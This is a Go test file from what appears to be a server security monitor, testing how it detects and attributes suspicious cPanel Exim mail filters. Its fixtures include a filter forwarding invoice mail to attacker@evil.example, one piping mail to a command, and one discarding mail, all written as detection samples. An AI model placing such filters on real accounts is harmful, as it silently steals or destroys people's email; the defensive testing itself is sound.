package checks

import (
	"context"
	"os"
	"path/filepath"
	"testing"
	"time"

	"github.com/pidginhost/csm/internal/config"
)

const filterPipeFixture = `# Exim filter - auto-generated by cPanel.
if
 $header_subject: contains "invoice"
then
 pipe "/usr/local/bin/handler --run"
endif
`

const filterBlackholeFixture = `# Exim filter - auto-generated by cPanel.
save /dev/null
`

const filterForwardFixture = `# Exim filter - auto-generated by cPanel.
if
 $header_subject: contains "invoice"
then
 deliver attacker@evil.example
endif
`

// Every mail-filter finding carries the filter path under the account home,
// so correlation attributes it lexically without a producer lookup.
func TestMailFilterFindingsAttributeByPath(t *testing.T) {
	withAccountHomeRoots(t, "/home")
	withTestStore(t)
	now := time.Date(2026, 9, 8, 12, 0, 0, 0, time.UTC)
	files := map[string]string{
		"/home/alice/etc/example.com/aura/filter":    filterAuraStealth,
		"/home/alice/etc/example.com/office/filter":  filterBlackholeFixture,
		"/home/alice/etc/example.com/sales/filter":   filterPipeFixture,
		"/home/alice/etc/example.com/support/filter": filterForwardFixture,
	}
	// A plain external forwarder is reported only when its file is new
	// relative to the baseline, so it appears on the second pass only.
	paths := []string{
		"/home/alice/etc/example.com/aura/filter",
		"/home/alice/etc/example.com/office/filter",
		"/home/alice/etc/example.com/sales/filter",
	}
	mtimes := map[string]time.Time{}
	for p := range files {
		mtimes[p] = now
	}
	withMockOS(t, &mockOS{
		glob: func(pattern string) ([]string, error) {
			if pattern == filepath.Join("/home", "*", "etc", "*", "*", "filter") {
				return paths, nil
			}
			return nil, nil
		},
		stat: mtimesByPath(mtimes),
		readFile: func(name string) ([]byte, error) {
			if name == "/etc/localdomains" {
				return []byte("example.com\n"), nil
			}
			if body, ok := files[name]; ok {
				return []byte(body), nil
			}
			return nil, os.ErrNotExist
		},
	})
	_ = CheckMailFilters(context.Background(), &config.Config{}, nil)
	paths = append(paths, "/home/alice/etc/example.com/support/filter")
	findings := CheckMailFilters(context.Background(), &config.Config{}, nil)
	seen := expectAttributed(t, findings, "alice")
	requireChecks(t, seen, "email_filter_exfil", "email_filter_blackhole", "email_filter_pipe", "email_filter_forwarder")
}
